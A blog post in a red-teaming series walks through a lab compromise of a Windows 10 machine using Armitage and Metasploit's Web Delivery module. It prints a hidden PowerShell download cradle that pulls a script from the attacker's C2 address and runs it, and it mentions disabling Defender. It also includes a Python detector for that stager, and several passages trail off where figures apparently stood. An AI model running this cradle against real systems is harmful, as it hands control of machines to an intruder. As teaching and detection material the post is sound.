
Red Teaming Series — Armitage

· frtg · 3 min read

During a Red Teaming or Penetration Testing engagement, ethical hackers—more accurately termed Penetration Testers—conduct authorized computer intrusion activities against an organization’s systems.

How does a Penetration Tester gain control of a system, whether server, workstation, smartphone, or connected device? The attacker must find a method to execute commands or code on the target system.

One of the most widely deployed tools in the sector is Metasploit (though several alternatives exist).

Armitage is a graphical interface that leverages Metasploit capabilities. The collaboration functionality, implemented via the teamserver command, proves particularly useful during team-based operations.

Armitage functionality enables:

  • shared Metasploit session access
  • shared hosts, data, and files downloaded from target systems
  • team communication
  • script creation for automation activities

Attack Scenario

In this example, the attacker’s workstation (Kali Linux) resides within the same network segment as the target (Windows 10).

Subnet: 10.0.2.0/24
Kali Linux: 10.0.2.15
Windows 10: 10.0.2.4

Assuming physical access to the Windows workstation and the ability to run commands on it, we chose PowerShell to launch the Web Delivery stager that hands control of the system to the attacker (T1190 – Exploit Public-Facing Application).

Attacker Configuration (Kali Linux)

For the Kali Linux system, Armitage installation is required:

root@kali:~# apt update
root@kali:~# apt install armitage
root@kali:~# msfdb init
root@kali:~# service postgresql start
root@kali:~# armitage

Target Configuration (Windows 10)

For the target system (Windows 10), Windows Defender antivirus was disabled. This is necessary because the PowerShell code would otherwise be immediately flagged as malicious.

It is naturally possible to generate code that circumvents protection systems such as antivirus solutions. This topic will be addressed in a forthcoming article.

Command & Control – Kali

The command and control server (also designated C2 or C&C) in this case coincides with the attacker’s machine and serves as the system for controlling compromised endpoints.

For workstation control, we deployed the Web Delivery module:

  • exploit > multi > script > web delivery


PowerShell command:

powershell.exe -nop -w hidden -c $s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('http://10.0.2.15:8080/uyyPYd62NNpvHHU'); 
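The Web Delivery stager above has a recognisable shape on the endpoint: a hidden, profile-less PowerShell process whose command line builds a WebClient, fetches a script from a raw IP:port URL and hands it to IEX. The following detector, an added example that is not part of the original post, scores process-creation events against those indicators; the event records and host name are constructed for the example, not real telemetry, and the field names mirror what a Sysmon Event ID 1 or EDR process log would carry.

```python
import re

# Constructed sample process-creation events (not real telemetry): one benign
# PowerShell launch and one matching the Web Delivery one-liner from this post.
SAMPLE_EVENTS = [
    {"host": "WIN10-04",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"host": "WIN10-04",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c $s=new-object net.webclient;"
                "$s.proxy=[Net.WebRequest]::GetSystemWebProxy();"
                "$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
                "IEX $s.downloadstring('http://10.0.2.15:8080/uyyPYd62NNpvHHU');"},
]

# Indicators of the stager, each as (name, pattern); the name is what the analyst sees.
INDICATORS = [
    ("no_profile",        re.compile(r"(?i)\s-nop(rofile)?\b")),
    ("hidden_window",     re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("invoke_expression", re.compile(r"(?i)\b(iex|invoke-expression)\b")),
    ("download_cradle",   re.compile(r"(?i)net\.webclient|downloadstring|downloadfile")),
    ("raw_ip_url",        re.compile(r"(?i)https?://\d{1,3}(\.\d{1,3}){3}:\d+/")),
]


def score_command_line(cmdline):
    """Return the names of the Web Delivery indicators present in a command line."""
    return [name for name, pattern in INDICATORS if pattern.search(cmdline)]


def analyze_events(events, threshold=3):
    """Flag process-creation events whose command line hits at least `threshold`
    indicators; a single hit (e.g. a download cradle in an admin script) is too
    noisy on its own, the combination is what characterises the stager."""
    hits = []
    for event in events:
        matched = score_command_line(event["cmdline"])
        if len(matched) >= threshold:
            hits.append({"host": event["host"], "image": event["image"],
                         "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in analyze_events(SAMPLE_EVENTS):
        print(f"[ALERT] {hit['host']}: {hit['image']} -> {', '.join(hit['indicators'])}")
```

Feeding the detector real process logs would flag the stager even with a different listener address or URI, since it keys on the cradle's structure rather than on the specific URL.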


Result of successful compromise:

From this position, both threat actors and penetration testers typically proceed with:

This attack phase corresponds to stage 6 “Command & Control” in the Cyber Kill Chain framework:

System interaction enables progression to phase 7 of the Cyber Kill Chain, “Actions on Objectives,” through system enumeration, domain reconnaissance, browser credential extraction, persistence establishment, lateral movement, and related activities:

System enumeration constitutes a critical step for understanding context and obtaining detailed information regarding the compromised endpoint:

Conclusions

The tools and operations described herein represent typical Red Teaming activities and align with operations conducted by cyber-criminals. In the latter case, additional layers of complexity emerge from the target environment, protection systems requiring circumvention, and various filtering and restriction mechanisms.

Defense against these attacks is achievable through adoption of specialized technical solutions and expert activities. Infrastructure defense necessarily incorporates:

  • Protection
    • Antivirus, firewalls, anti-spam, sandboxes, WAF, and IPS are essential but can be readily circumvented. Continuous monitoring through a Managed SOC provides detection capabilities that extend beyond perimeter defenses.
  • Detection
    • Monitoring technologies and threat hunting activities conducted by specialized analysts
  • Response
    • Incident response operations